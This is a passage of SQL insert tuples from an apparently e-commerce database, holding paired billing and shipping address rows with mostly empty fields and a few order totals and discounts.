(1701, 1034, '2026-04-14 08:34:41', '2026-04-14 08:34:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1702, 1034, '2026-04-14 08:34:42', '2026-04-14 08:34:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1703, 1035, '2026-04-14 09:24:43', '2026-04-14 09:24:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1704, 1035, '2026-04-14 09:24:43', '2026-04-14 09:24:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1705, 1036, '2026-04-14 10:37:34', '2026-04-14 10:37:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1706, 1036, '2026-04-14 10:37:34', '2026-04-14 10:37:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1707, 1037, '2026-04-14 15:54:38', '2026-04-14 15:54:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1708, 1037, '2026-04-14 15:54:38', '2026-04-14 15:54:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1709, 1038, '2026-04-14 17:34:50', '2026-04-14 17:34:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1710, 1038, '2026-04-14 17:34:50', '2026-04-14 17:34:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1711, 1039, '2026-04-14 17:54:58', '2026-04-14 17:54:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1712, 1039, '2026-04-14 17:54:58', '2026-04-14 17:54:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1713, 1040, '2026-04-14 18:15:46', '2026-04-14 18:15:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1714, 1040, '2026-04-14 18:15:46', '2026-04-14 18:15:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1715, 1041, '2026-04-15 00:11:40', '2026-04-15 00:11:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1716, 1041, '2026-04-15 00:11:40', '2026-04-15 00:11:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1717, 1042, '2026-04-15 03:07:55', '2026-04-15 03:07:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1718, 1042, '2026-04-15 03:07:55', '2026-04-15 03:07:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1719, 1043, '2026-04-15 08:36:16', '2026-04-15 08:36:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1720, 1043, '2026-04-15 08:36:16', '2026-04-15 08:36:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1721, 1044, '2026-04-15 13:28:33', '2026-04-15 13:28:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1722, 1044, '2026-04-15 13:28:33', '2026-04-15 13:28:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1723, 1045, '2026-04-15 18:11:14', '2026-04-15 18:11:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1724, 1045, '2026-04-15 18:11:14', '2026-04-15 18:11:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1725, 1046, '2026-04-15 22:52:28', '2026-04-15 22:52:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1726, 1046, '2026-04-15 22:52:28', '2026-04-15 22:52:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1727, 1047, '2026-04-16 01:37:27', '2026-04-16 01:37:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1728, 1047, '2026-04-16 01:37:27', '2026-04-16 01:37:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1729, 1048, '2026-04-16 05:02:09', '2026-04-16 05:02:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1730, 1048, '2026-04-16 05:02:09', '2026-04-16 05:02:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1731, 1049, '2026-04-16 08:12:17', '2026-04-16 08:12:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1732, 1049, '2026-04-16 08:12:17', '2026-04-16 08:12:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1733, 1050, '2026-04-16 08:49:44', '2026-04-16 08:49:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1734, 1050, '2026-04-16 08:49:44', '2026-04-16 08:49:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1735, 1051, '2026-04-16 09:54:52', '2026-04-16 09:54:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1736, 1051, '2026-04-16 09:54:52', '2026-04-16 09:54:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1737, 1052, '2026-04-16 10:08:30', '2026-04-16 10:08:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1738, 1052, '2026-04-16 10:08:30', '2026-04-16 10:08:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1739, 1053, '2026-04-16 10:16:19', '2026-04-16 10:16:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1740, 1053, '2026-04-16 10:16:19', '2026-04-16 10:16:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1741, 1054, '2026-04-16 10:39:40', '2026-04-16 10:39:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1742, 1054, '2026-04-16 10:39:40', '2026-04-16 10:39:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1743, 1055, '2026-04-16 14:08:56', '2026-04-16 14:08:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1744, 1055, '2026-04-16 14:08:56', '2026-04-16 14:08:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1745, 1056, '2026-04-16 14:46:10', '2026-04-16 14:46:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1746, 1056, '2026-04-16 14:46:10', '2026-04-16 14:46:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
